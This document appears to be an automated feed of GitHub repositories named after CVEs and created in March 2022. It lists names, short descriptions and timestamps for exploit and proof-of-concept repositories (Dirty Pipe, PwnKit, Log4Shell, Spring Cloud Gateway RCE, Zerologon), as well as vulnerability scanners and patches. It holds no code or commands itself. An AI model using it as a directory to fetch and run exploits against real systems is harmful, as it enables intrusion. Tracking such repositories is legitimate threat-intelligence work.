no description : Satheesh575555/linux-4.19.72_CVE-2020-8428 create time: 2022-03-30T10:50:28Z

no description : pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243 create time: 2022-03-30T09:35:35Z

no description : nanopathi/linux-4.19.72_CVE-2020-25705 create time: 2022-03-30T09:10:22Z

no description : Satheesh575555/linux-4.19.72_CVE-2019-19252 create time: 2022-03-30T07:51:50Z

no description : Threonic/CVE-2021-28480 create time: 2022-03-30T07:57:43Z

no description : Satheesh575555/linux-4.19.72_CVE-2020-29368 create time: 2022-03-29T12:40:37Z

BatFlat CMS v1.3.6 - Improper Access Control : LeoBreaker1411/CVE-2021-41652 create time: 2022-03-30T06:29:02Z

Details,PoC and patches for CVE-2022-23884 : LuckyDogDog/CVE-2022-23884 create time: 2022-03-30T04:26:31Z

no description : nanopathi/KERNEL_CVE-2020-29370_FIX create time: 2022-03-30T04:52:56Z

CVE-2022-22963 PoC : dinosn/CVE-2022-22963 create time: 2022-03-30T05:04:24Z

no description : bigbigban1/CVE-2022-22947-exp create time: 2022-03-30T03:10:23Z

no description : metapox/CVE-2020-25613 create time: 2022-03-30T00:51:08Z

golang implementation of CVE-2021-403 : hAV9sad/CVE-2021-4034 create time: 2022-03-30T01:20:02Z

CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution : b4keSn4ke/CVE-2019-9193 create time: 2022-03-29T21:02:02Z

Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472). : Nekoox/zerologon create time: 2022-03-29T21:34:56Z

no description : coco0x0a/CVE-2021-2109 create time: 2022-03-29T19:29:29Z

Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096 : Maverick-cmd/Chrome-and-Edge-Version-Dumper create time: 2022-03-29T20:06:33Z

no description : horizon3ai/CVE-2021-44142 create time: 2022-03-29T19:03:38Z

no description : T4t4ru/CVE-2020-3187 create time: 2022-03-29T18:06:29Z

no description : hrsman/Samba-CVE-2021-44142 create time: 2022-03-29T17:32:25Z

no description : Vancomycin-g/CVE-2022-22947 create time: 2022-03-29T17:17:34Z

Scanner for CVE-2022-22948 an Information Disclosure in VMWare vCenter : PenteraIO/CVE-2022-22948 create time: 2021-10-17T09:59:20Z

no description : tzwlhack/CVE-2022-24934 create time: 2022-03-29T15:51:29Z

no description : tzwlhack/WPS-CVE-2022-24934 create time: 2022-03-29T15:29:59Z

no description : tzwlhack/CVE-2021-21017 create time: 2022-03-29T14:45:16Z

Veeam Unauth Remote Code Execution : sinsinology/CVE-2022-26500 create time: 2022-03-29T14:34:01Z

CVE-2022-24934 : nanaao/CVE-2022-24934 create time: 2022-03-25T10:29:35Z

no description : nanopathi/CVE-2020-29370_AFTERFIX create time: 2022-03-29T14:17:51Z

no description : nanopathi/CVE-2020-029370_AFTPATCH create time: 2022-03-29T13:35:16Z

no description : nanopathi/aft_KERNEL_KITTORVALDS_CVE2020-29370 create time: 2022-03-29T11:55:26Z

no description : nanopathi/kERNEL_GIT_TORVALDS_AFP_CVE-2020-29370 create time: 2022-03-29T11:45:12Z

no description : nanopathi/packages_apps_Nfc_cve-2020_02453 create time: 2022-03-29T09:29:01Z

no description : Aevanathema/cve2018go create time: 2022-03-29T09:19:58Z

no description : Trinadh465/Nfc-CVE-2020-0453 create time: 2022-03-29T09:03:39Z

no description : nanopathi/Packages_apps_Nfc_CVE-2020-0453 create time: 2022-03-29T08:06:46Z

no description : pazhanivel07/Nfc_CVE-2020-0453 create time: 2022-03-29T06:17:38Z

no description : koleksibot/CVE-2022 create time: 2022-03-29T05:16:07Z

Pasos a seguir para explotar la vulnerabilidad CVE-2021-27928 : GatoGamer1155/CVE-2021-27928 create time: 2022-03-29T02:54:37Z

no description : jcatala/f_poc_cve-2021-4034 create time: 2022-03-29T01:06:32Z

no description : darkpills/CVE-2021-25094-tatsu-preauth-rce create time: 2022-01-03T21:19:42Z

no description : 0xNix/CVE-2021-4034 create time: 2022-03-28T19:26:39Z

Exploit for CVE-2022-27666 : plummm/CVE-2022-27666 create time: 2022-03-23T22:54:28Z

Suzuki connect app is used to get the car information like Fuel, Ignition status, Current location, Seat buckle status etc. In Ignis, Zeta variant car if the Fuel CAN messages and Seat buckle status is spoofed via OBD 2 port with the crafted value (e.g. zero percent fuel and Car seat is buckled ), then the same value is reflected on Suzuki connect app, which can mislead the user. : nsbogam/CVE-2022-26269 create time: 2022-03-28T17:10:24Z

no description : puckiestyle/CVE-2021-41773 create time: 2022-03-28T11:02:46Z

no description : misterxid/watchguard_cve-2022-26318 create time: 2022-03-28T10:53:38Z

no description : Tankirat/CVE-2017-5638 create time: 2022-03-28T07:58:31Z

Check and report for cve_2022_23307 (log4shell) on your system. : buluma/ansible-role-cve_2022-23307 create time: 2022-03-28T08:20:31Z

no description : Gaphuang/CVE-2022-10086-TEST- create time: 2022-03-28T07:41:53Z

CVE-2022-27927 Microfinance Management System V1.0 SQL Injection Vulnerability : erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated create time: 2022-03-27T08:17:47Z

Description of Exploit SMBGhost CVE-2020-0796 : vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796- create time: 2022-03-28T04:58:17Z

introduction to hacking second presentation : mehrzad1994/CVE-2021-21193 create time: 2022-03-28T03:51:58Z

no description : chattopadhyaykittu/CVE-2017-0037 create time: 2022-03-28T01:19:58Z

CVE 2020-1034 exploit and presentation : GeorgyFirsov/CVE-2020-1034 create time: 2022-03-23T19:14:26Z

Pasos a seguir para explotar la vulnerabilidad CVE-2021-27928 : GatoGamer1155/CVE-2021-27928 create time: 2022-03-27T23:46:36Z

no description : N3w-elf/CVE-2021-41773- create time: 2022-03-27T20:10:30Z

Watchguard RCE POC CVE-2022-26318 : Throns1956/watchguard_cve-2022-26318 create time: 2022-03-27T12:51:19Z

CVE-2022-0995 exploit : Bonfee/CVE-2022-0995 create time: 2022-03-26T21:46:09Z

Fake WPS Update Server PoC : MagicPiperSec/WPS-CVE-2022-24934 create time: 2022-03-27T07:47:10Z

no description : warmachine-57/CVE-2021-44117 create time: 2022-03-27T05:50:34Z

no description : sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability create time: 2022-03-26T22:50:36Z

no description : tzwlhack/CVE-2021-4034 create time: 2022-03-26T14:30:11Z

no description : sysenter-eip/CVE-2022-26629 create time: 2022-03-26T06:06:05Z

no description : scopion/CVE-2022-26629 create time: 2022-03-25T06:16:09Z

Poc : tmoneypenny/CVE-2022-0847 create time: 2022-03-22T03:17:51Z

POC for CVE-2022-23648 : raesene/CVE-2022-23648-POC create time: 2022-03-25T19:43:59Z

CVE 2022-0847 : Patocoh/Research-Dirty-Pipe create time: 2022-03-25T16:27:40Z

Container Excape PoC for CVE-2022-0847 "DirtyPipe" : DataDog/dirtypipe-container-breakout-poc create time: 2022-03-09T19:38:44Z

no description : tzwlhack/CVE-2018-20250 create time: 2022-03-25T13:02:41Z

poc for CVE-2022-22947 : Nathaniel1025/CVE-2022-22947 create time: 2022-03-25T12:43:53Z

CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7 : RICSecLab/CVE-2019-0708 create time: 2020-03-15T19:33:53Z

CVE-2022-24934 : shakeman8/CVE-2022-24934 create time: 2022-03-25T07:13:17Z

no description : sysenter-eip/CVE-2022-26629 create time: 2022-03-25T04:58:20Z

no description : Jiang59991/cve-2021-21300-plus create time: 2022-03-25T02:59:41Z

no description : spasm5/CVE-2018-12326 create time: 2022-03-25T01:44:26Z

A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Only takes in host and port of web server as required arguments. : alexander-fernandes/CVE-2019-16278 create time: 2022-03-24T12:06:55Z

no description : nxtexploit/CVE-2020-3580 create time: 2022-03-24T09:34:04Z

CVE-2021-40373 - remote code execution : maikroservice/CVE-2021-40373 create time: 2021-08-31T13:03:10Z

no description : the-valluvarsploit/CVE-2018-6574 create time: 2022-03-24T08:40:42Z

This is a exploit code for CVE-202-8163 : TKLinux966/CVE-2020-8163 create time: 2022-03-24T06:43:39Z

CVE-2022-0185 analysis write up : chenaotian/CVE-2022-25636 create time: 2022-03-24T07:04:55Z

CVE-2021-44529 PoC : jkana/CVE-2021-44529 create time: 2022-03-24T03:58:16Z

no description : buff07/CVE-2022-10249 create time: 2022-03-24T02:09:28Z

PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254) : nonamecoder/CVE-2022-27254 create time: 2022-03-23T15:03:09Z

no description : mtthwstffrd/berdav-CVE-2021-4034 create time: 2022-03-23T11:08:20Z

Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite. : domain9065v/bazad3 create time: 2022-03-23T06:02:52Z

no description : buff07/CVE-2022-24294 create time: 2022-03-23T06:26:02Z

no description : buff07/CVE-2022-24293 create time: 2022-03-23T06:25:56Z

no description : buff07/CVE-2022-24292 create time: 2022-03-23T06:25:45Z

Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability CVE-2021-41338 Security Vulnerability Released: Oct 12, 2021 Assigning CNA: Microsoft MITRE CVE-2021-41338 CVSS:3.1 5.5 / 5.0 Attack Vector Local Attack Complexity Low Privileges Required Low User Interaction None Scope Unchanged Confidentiality High Integrity None Availability None Exploit Code Maturity Proof-of-Concept Remediation Level Official Fix Report Confidence Confirmed Please see Common Vulnerability Scoring System for more information on the definition of these metrics. Exploitability The following table provides an exploitability assessment for this vulnerability at the time of original publication. Yes No Exploitation Less Likely : Mario-Kart-Felix/firewall-cve create time: 2022-03-22T22:53:32Z

Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page. : febinrev/CVE-2021-46398_Chamilo-LMS-RCE create time: 2022-03-22T17:35:38Z

CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation : 0xf4n9x/CVE-2022-24990 create time: 2022-03-20T05:15:16Z

CVE-2021-43530 A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. This bug only affects Firefox for Android. Other operating systems are unaffected.. This vulnerability affects Firefox < 94. : hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader- create time: 2022-03-22T07:07:42Z

Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990. : cryst4lliz3/CVE-2022-0824 create time: 2022-03-22T03:49:51Z

no description : Enokiy/cve-2022-22947-springcloud-gateway create time: 2022-03-21T23:37:20Z

no description : SivaPriyaRanganatha/CVE-2020-6418 create time: 2022-03-21T23:05:38Z

Reproduction of CVE-2020-36518 in Spring Boot 2.5.10 : ghillert/boot-jackson-cve create time: 2022-03-21T21:13:28Z

no description : yazan828/CVE-2017-1000004 create time: 2022-03-21T13:35:38Z

no description : wy17/CVE-2022-1997 create time: 2022-03-21T15:00:48Z

no description : T4t4ru/CVE-2018-16845 create time: 2022-03-21T13:15:07Z

Simple webhook to block exploitation of CVE-2022-0811 : spiarh/webhook-cve-2022-0811 create time: 2022-03-21T09:39:22Z

Dirty Cow CVE-2016-5195 Vulnerability : gurpreetsinghsaluja/dirtycow create time: 2022-03-21T08:35:21Z

no description : Anonymous-Family/CVE-2015-1701-download create time: 2022-03-21T06:39:18Z

no description : Anonymous-Family/CVE-2015-1701 create time: 2022-03-21T06:26:21Z

no description : LTiDi2000/CVE-2020-2551 create time: 2022-03-21T03:58:29Z

pwncat module that automatically exploits CVE-2022-0847 (dirtypipe) : DanaEpp/pwncat_dirtypipe create time: 2022-03-20T23:02:43Z

Python3 implementation of CVE 2013-0156 : Atreb92/CVE-2013-0156 create time: 2022-03-20T19:22:24Z

Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab : twseptian/cve-2022-24112 create time: 2022-03-20T16:35:55Z

RCE exploit for CVE-2017-9841 : akr3ch/CVE-2017-9841 create time: 2022-03-20T07:01:52Z

CVE-2022-24990信息泄露+RCE 一条龙 : lishang520/CVE-2022-24990 create time: 2022-03-20T05:21:08Z

CVE-2022-22600 Proof of Concept : KlinKlinKlin/MSF-screenrecord-on-MacOS create time: 2022-03-19T04:13:52Z

0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020/2021 CVE-2021-2119 : chatbottesisgmailh/Sauercloude create time: 2022-03-20T03:17:03Z

no description : mtthwstffrd/saleemrashid-sudo-cve-2019-18634 create time: 2022-03-20T01:39:22Z

CVE-2022-24086 and CVE-2022-24087 exploits proof of concept : Sam00rx/CVE-2022-24087 create time: 2022-03-19T23:33:24Z

Remote Code Execution in LocalStack 0.12.6 : TheCyberGeek/CVE-2022-27251 create time: 2022-03-19T20:49:56Z

Documentation and proof of concept code for CVE-2022-24126. : tremwil/ds3-nrssr-rce create time: 2022-01-28T20:37:14Z

CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code : skasanagottu57gmailv/gerhart01 create time: 2022-03-19T15:47:10Z

WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731) : DavidBuchanan314/WAMpage create time: 2021-12-26T04:29:09Z

PoC for CVE-2017-0075 : belyakovvitagmailt/4B5F5F4Bp create time: 2022-03-19T13:18:12Z

Exploit for CVE-2021_33751 used in PWN2OWN2021 : 1N1T1A/pwn2own_exploit create time: 2022-03-19T11:39:46Z

🎩 🤟🏻 [P1-$10,000] Google Chrome, Microsoft Edge and Opera - vulnerability reported by Maciej Pulikowski - System environment variables leak - CVE-2022-0337 : Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera create time: 2022-03-19T08:10:46Z

PoC for Dirty COW (CVE-2016-5195) : vinspiert/scumjrs create time: 2022-03-19T02:18:40Z

PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. : 2273852279qqs/0vercl0k create time: 2022-03-19T01:33:04Z

TOP All bugbounty pentesting CVE-2022- POC Exp Things : hktalent/TOP create time: 2022-03-19T01:54:15Z

CVE-2022-22600 Proof of Concept : acheong08/MSF-screenrecord-on-MacOS create time: 2021-12-22T05:03:29Z

Exploit for CVE-2022-27226 : SakuraSamuraii/ez-iRZ create time: 2022-03-16T17:45:12Z

Hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn a root shell. (and attempts to restore the damaged binary as well) : LudovicPatho/CVE-2022-0847 create time: 2022-03-18T22:51:02Z

Redis沙盒逃逸漏洞复现(CVE-2022-0543) : Newbee740/REDIS-CVE-2022-0543 create time: 2022-03-18T17:15:19Z

A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project’s Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server. : febinrev/CVE-2021-45010-TinyFileManager-Exploit create time: 2022-03-18T14:00:03Z

A test app to check if your device is vulnerable to CVE-2021-30955 : GeoSn0w/Pentagram-exploit-tester create time: 2022-03-18T12:32:10Z

CVE-2022-22947 memshell : viemsr/spring_cloud_gateway_memshell create time: 2022-03-18T07:17:17Z

Local privilege escalation for OS X 10.10.5 via CVE-2016-1828. : berritus163t/bazad5 create time: 2022-03-18T06:59:32Z

no description : tzwlhack/CVE-2017-11882 create time: 2022-03-18T05:38:39Z

CVE-2021-3156 : RodricBr/CVE-2021-3156 create time: 2022-03-18T00:05:48Z

node-ipc is malware / protestware! : scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 create time: 2022-03-17T16:49:22Z

Kibana <6.6.0 RCE written in python3 : Cr4ckC4t/cve-2019-7609 create time: 2022-03-17T15:33:33Z

GLPI automatic exploitation tool for CVE-2020-15175 : Xn2/GLPwn create time: 2022-03-14T13:51:17Z

A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability. : LP-H4cmilo/CVE-2022-0847_DirtyPipe_Exploits create time: 2022-03-17T11:01:48Z

exploits XAR – Arbitrary File Write : poizon-box/CVE-2022-22582 create time: 2022-03-17T10:16:27Z

no description : Wrin9/CVE-2022-22947 create time: 2022-03-17T09:12:51Z

Apache APISIX 2.12.1 Remote Code Execution by IP restriction bypass and using default admin AIP token : kavishkagihan/CVE-2022-24112-POC create time: 2022-03-17T08:22:54Z

CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation. : xigexbh/bazad1 create time: 2022-03-17T03:38:01Z

no description : Jiang59991/cve-2021-21300 create time: 2022-03-17T02:37:58Z

Local Privilege Escalation (LPE) vulnerability found on Polkit's pkexec utility : Hifumi1337/CVE-2021-4034 create time: 2022-03-16T23:05:53Z

A years old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77. : tandasat/CVE-2022-25949 create time: 2022-03-16T14:42:21Z

Exploitation of CVE-2020-256480 using scapy : dim0x69/cve-2022-25640-exploit create time: 2022-03-16T14:59:08Z

IoT CVEs as abnormal events to evaluate a real-time host-based IDS. https://doi.org/10.1016/j.future.2022.03.001 : InesMartins31/iot-cves create time: 2019-10-09T20:41:50Z

no description : Jiang59991/cve-2021-21300 create time: 2022-03-16T13:36:02Z

[CVE-2021-21983] VMware vRealize Operations (vROps) Manager File Path Traversal Leads to Remote Code Execution (RCE) : murataydemir/CVE-2021-21983 create time: 2022-03-16T11:56:25Z

no description : pazhanivel07/frameworks_base-CVE-2021-0595 create time: 2022-03-16T11:07:36Z

no description : pazhanivel07/Settings-CVE-2021-0595 create time: 2022-03-16T10:59:58Z

no description : Jiang59991/cve-2021-21300 create time: 2022-03-16T10:56:23Z

no description : si1ent-le/CVE-2019-5736 create time: 2022-03-16T09:22:20Z

no description : Jiang59991/cve-2021-21300 create time: 2022-03-16T09:28:29Z

Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability : p0dalirius/CVE-2021-43008-AdminerRead create time: 2021-12-13T17:26:49Z

no description : sinsinology/CVE-2022-26503 create time: 2022-03-16T09:54:16Z

Apache APISIX Remote Code Execution (CVE-2022-24112) proof of concept exploit : M4xSec/Apache-APISIX-CVE-2022-24112 create time: 2022-03-16T09:19:12Z

CVE-2022-0543_RCE,Redis Lua沙盒绕过 命令执行 : aodsec/CVE-2022-0543 create time: 2022-03-16T06:41:50Z

Exploring and exploiting CVE-2022-0778. : BobTheShoplifter/CVE-2022-0778-POC create time: 2022-03-16T06:29:42Z

Proof of concept for CVE-2022-0778, which triggers an infinite loop in parsing X.509 certificates due to a bug in BN_mod_sqrt : drago-96/CVE-2022-0778 create time: 2022-03-15T19:06:33Z

CVE-2018-11235: Git Submodule RCE : SenSecurity/exploit create time: 2022-03-15T17:33:22Z

no description : W0rty/CVE-2021-39165 create time: 2022-03-15T18:14:46Z

Simple python script to exploit Vsftpd 2.3.4 Backdoor Command Execution (CVE-2011-2523) : PrestaDZ/vsftpd-2.3.4 create time: 2022-03-15T13:39:19Z

no description : dmlino/cve-2018-6574 create time: 2022-03-15T14:11:57Z

desc_race exploit for iOS 15.0 - 15.1.1 (with stable kernel r/w primitives) (CVE-2021-30955) : Dylbin/desc_race create time: 2022-03-15T13:30:38Z

Python script to check if your kernel is vulnerable to Dirty pipe CVE-2022-0847 : MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker create time: 2022-03-15T11:25:19Z

no description : bysinks/CVE-2021-29441 create time: 2022-03-15T08:53:59Z

no description : phuonguno98/CVE-2022-0847-DirtyPipe-Exploits create time: 2022-03-15T08:54:38Z

no description : bysinks/CVE-2022-22947 create time: 2022-03-15T08:50:13Z

no description : githublihaha/DirtyPIPE-CVE-2022-0847 create time: 2022-03-15T08:33:19Z

no description : Mani1325/ka-cve-2021-21341 create time: 2022-03-15T07:28:52Z

no description : phuonguno98/CVE-2022-0847 create time: 2022-03-15T06:06:31Z

Proof of concept app for Android permanent denial-of-service vulnerability, CVE-2020-0443 : Supersonic/CVE-2020-0443 create time: 2022-03-15T04:54:31Z

no description : k0zulzr/CVE-2022-24086-RCE create time: 2022-03-15T05:11:23Z

pkexec --> privilege escalation : TomSgn/CVE-2021-4034 create time: 2022-03-14T22:42:49Z

Implementation of CVE-2022-0847 as a shellcode : Shotokhan/cve_2022_0847_shellcode create time: 2022-03-14T22:54:15Z

CVE-2022-24122 Proof of Concept : meowmeowxw/CVE-2022-24122 create time: 2022-03-10T15:20:04Z

Exploit for the Rails CVE-2019-5420 : trickstersec/CVE-2019-5420 create time: 2022-03-14T17:29:47Z

PoC for CVE-2021-33193 : jeremy-cxf/CVE-2021-33193 create time: 2022-03-14T17:30:22Z

no description : Fa1c0n35/CVE-2021-41773 create time: 2022-03-14T16:43:49Z

Exploits for Hotel Druid 3.0.3 - Remote Code Execution (RCE) CVE-2022-22909 : kaal18/CVE-2022-22909 create time: 2022-03-14T17:10:08Z

CVE-2022-0847 POC : breachnix/dirty-pipe-poc create time: 2022-03-14T15:32:25Z

no description : p0ch4t/CVE-2022-0867 create time: 2022-03-14T14:19:28Z

dirtypipe : CYB3RK1D/CVE-2022-0847 create time: 2022-03-14T13:21:25Z

CVE-2021-30955 iOS 15.1.1 POC for 6GB RAM devices (A14-A15) : markie-dev/desc_race_A15 create time: 2022-03-14T06:42:45Z

Oracle Access Manager Unauthenticated Attacker Vulnerability CVE-2021-35587 : antx-code/CVE-2021-35587 create time: 2022-03-14T05:03:54Z

no description : cryst4lliz3/CVE-2021-44228-vuln-app create time: 2022-03-14T04:13:13Z

no description : cryst4lliz3/CVE-2021-44228 create time: 2022-03-14T04:09:36Z

no description : cryst4lliz3/CVE-2021-22205 create time: 2022-03-14T04:09:18Z

no description : cryst4lliz3/CVE-2021-41773 create time: 2022-03-14T04:08:56Z

no description : cryst4lliz3/CVE-2021-42013 create time: 2022-03-14T04:08:24Z

OPEN AND READ JSON : StepOK10/CVE.NVD.NIST2202-2002 create time: 2022-03-13T21:01:21Z

CVE-2021-4034 (PWNKIT). A memory corruption vulnerability in Polkit's pkexec, which allows any unprivileged user to gain full root privileges on a vulnerable system using default polkit configuration. : Nel0x/pwnkit-vulnerability create time: 2022-03-13T20:24:59Z

Dirty Pipe (CVE-2022-0847) zafiyeti kontrolü : realbatuhan/dirtypipetester create time: 2022-03-13T19:30:14Z

no description : micha3lcve/LOG4J-mass-rce-CVE-2021-44228 create time: 2022-03-13T15:23:49Z

spring-cloud-gateway-rce CVE-2022-22947 : k3rwin/spring-cloud-gateway-rce create time: 2022-03-13T10:00:21Z

no description : Kashiki078/CVE-2021-4034 create time: 2022-03-13T07:40:56Z

CVE-2022-0847 (Dirty Pipe) is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. /etc/passwd, /etc/shadow. : sa-infinity8888/Dirty-Pipe-CVE-2022-0847 create time: 2022-03-13T05:51:06Z

Apache2 2.4.49 - LFI & RCE Exploit - CVE-2021-41773 : thehackersbrain/CVE-2021-41773 create time: 2022-03-12T21:24:55Z

A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability. : AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits create time: 2022-03-12T20:57:24Z

my personal exploit of CVE-2022-0847(dirty pipe) : arttnba3/CVE-2022-0847 create time: 2022-03-12T11:31:46Z

Small PoC of CVE-2021-41773 : the29a/CVE-2021-41773 create time: 2022-03-11T21:50:35Z

Script en python para crear imagenes maliciosas (reverse shell) : GatoGamer1155/CVE-2021-22204 create time: 2022-03-11T19:02:28Z

Seowon SLR-120S42G RCE Exploit / Remote Code Execution (Unauthenticated) : TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated create time: 2022-03-11T00:16:35Z

Script en python para crear imagenes maliciosas (reverse shell) : GatoGamer1155/CVE-2021-22204 create time: 2022-03-11T17:31:07Z

no description : frarinha/CVE-2018-6574 create time: 2022-03-11T13:40:22Z

LPE on linux kernel based on CVE-2017-14954, CVE-2017-18344, CVE-2017-5123 : echo-devim/exploit_linux_kernel4.13 create time: 2022-03-11T12:54:10Z

MSF Module CVE-2018-15727 : svnsyn/CVE-2018-15727 create time: 2022-03-11T13:20:19Z

Log4j2组件命令执行RCE / Code By:Jun_sheng : Jun-5heng/CVE-2021-44228 create time: 2022-03-11T12:43:15Z

no description : sakib570/CVE-2018-1263-Demo create time: 2022-03-11T12:07:16Z

Log4j2组件命令执行RCE / Code By:Jun_sheng : Jun-5heng/CVE-2021-44228 create time: 2022-03-11T10:08:12Z

A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell : crusoe112/DirtyPipePython create time: 2022-03-11T08:22:56Z

CVE-2022-0492 EXP and Analysis write up : chenaotian/CVE-2022-0492 create time: 2022-03-11T08:02:46Z

no description : dskmehra/CVE-2022-0848 create time: 2022-03-11T07:26:04Z

MetaBase 任意文件读取 : Chen-ling-afk/CVE-2021-41277 create time: 2022-03-11T06:39:38Z

no description : Greetdawn/CVE-2022-0847-DirtyPipe- create time: 2022-03-11T02:51:54Z

cve-2022-22947-docker : hh-hunter/cve-2022-22947-docker create time: 2022-03-11T01:27:55Z

no description : VVeakee/CVE-2022-24990-EXP create time: 2022-03-11T01:06:26Z

CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file. : terabitSec/dirtyPipe-automaticRoot create time: 2022-03-10T20:15:07Z

About Script en python sobre la vulnerabilidad CVE-2021-3156 : GatoGamer1155/CVE-2021-3156 create time: 2022-03-10T19:10:28Z

no description : michaelklaan/CVE-2022-0847-Dirty-Pipe create time: 2022-03-10T16:09:16Z

no description : michaelklaan/CVE-2022-22947-Spring-Cloud create time: 2022-03-10T16:08:23Z

HERRAMIENTA AUTOMATIZADA PARA LA DETECCION DE LA VULNERABILIDAD CVE-2021-44228 : MiguelM001/vulescanjndilookup create time: 2022-03-10T14:57:30Z

CVE-2022-0847 Linux kernel LPE POC : akecha/Dirty-pipe create time: 2022-03-10T14:02:30Z

CVE-2022-0847-DirtyPipe-Exploit : V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-10T13:23:52Z

no description : mohamedimthiyaj/cve-2018 create time: 2022-03-10T11:20:39Z

no description : ByteHackr/CVE-2022-0853 create time: 2022-03-10T09:10:56Z

no description : PaoPaoLong-lab/Spring-CVE-2022-22947- create time: 2022-03-10T06:01:32Z

CVE-2021-44228 in Container : cryst4lliz3/CVE-2021-44228 create time: 2022-03-10T04:32:07Z

no description : PaoPaoLong-lab/Spring-Cloud-Gateway-CVE-2022-22947- create time: 2022-03-10T05:07:59Z

CVE-2022-22947 Exploit script : An0th3r/CVE-2022-22947-exp create time: 2022-03-10T03:51:47Z

仅仅是poc,并不是exp : VVeakee/CVE-2022-24990-POC create time: 2022-03-10T03:16:04Z

no description : babyshen/CVE-2019-13272 create time: 2022-03-10T01:27:46Z

CVE-2022-0847 POC and Docker and Analysis write up : chenaotian/CVE-2022-0847 create time: 2022-03-10T01:27:29Z

no description : edsonjt81/CVE-2021-4034-Linux create time: 2022-03-10T01:24:14Z

no description : edsonjt81/CVE-2022-0847-Linux create time: 2022-03-10T01:18:26Z

A root exploit for CVE-2022-0847 (Dirty Pipe) : babyshen/CVE-2022-0847 create time: 2022-03-10T00:54:11Z

Exploits CVE-2022-22588 vulnerability on iOS 15.2 and lower. Provided for research purposes only. : trevorspiniolas/homekitdos create time: 2022-01-01T07:38:48Z

no description : T4t4ru/CVE-2022-0847 create time: 2022-03-09T16:47:36Z

Dirty Pipe POC : gyaansastra/CVE-2022-0847 create time: 2022-03-09T15:44:58Z

ThinkAdmin CVE-2020-25540 POC : Rajchowdhury420/ThinkAdmin-CVE-2020-25540 create time: 2022-03-09T13:08:31Z

Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well) : nanaao/Dirtypipe-exploit create time: 2022-03-09T07:16:57Z

no description : pentestblogin/pentestblog-CVE-2022-0847 create time: 2022-03-09T10:24:42Z

no description : qjh2333/CVE-2019-10999 create time: 2022-03-09T09:35:15Z

no description : AyoubNajim/cve-2022-0847dirtypipe-exploit create time: 2022-03-09T10:05:53Z

Polkit's Pkexec CVE-2021-4034 Proof Of Concept and Patching : ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034 create time: 2022-03-09T08:44:02Z

no description : Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-09T05:22:20Z

Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well) : MRNIKO1/Dirtypipe-exploit create time: 2022-03-09T04:42:59Z

no description : tuo4n8/CVE-2020-28653 create time: 2021-07-31T13:00:15Z

CVE-2022-0847 : Al1ex/CVE-2022-0847 create time: 2022-03-09T02:47:08Z

no description : Greetdawn/CVE-2022-0847-DirtyPipe create time: 2022-03-09T02:47:06Z

Springboot web application accepts a name get parameter and logs its value to log4j2. Vulnerable to CVE-2021-44228. : paulvkitor/log4shellwithlog4j2_13_3 create time: 2022-03-09T02:29:58Z

no description : bakhtiyarsierad/CVE-2021-4034-bug-root create time: 2022-03-09T02:04:07Z

A “Dirty Pipe” vulnerability with CVE-2022-0847 and a CVSS score of 7.8 has been identified, affecting Linux Kernel 5.8 and higher. The vulnerability allows attackers to overwrite data in read-only files. Threat actors can exploit this vulnerability to privilege themselves with code injection. : dadhee/CVE-2022-0847_DirtyPipeExploit create time: 2022-03-09T01:55:04Z

This script exploits CVE-2021-41773 to print file or/and execute command. : mauricelambert/CVE-2021-41773 create time: 2022-03-08T21:55:53Z

This script exploits CVE-2021-42013 to print file or/and execute command. : mauricelambert/CVE-2021-42013 create time: 2022-03-08T21:48:40Z

Script en python sobre la vulnerabilidad CVE-2021-3560 : GatoGamer1155/CVE-2021-3560 create time: 2022-03-08T20:27:00Z

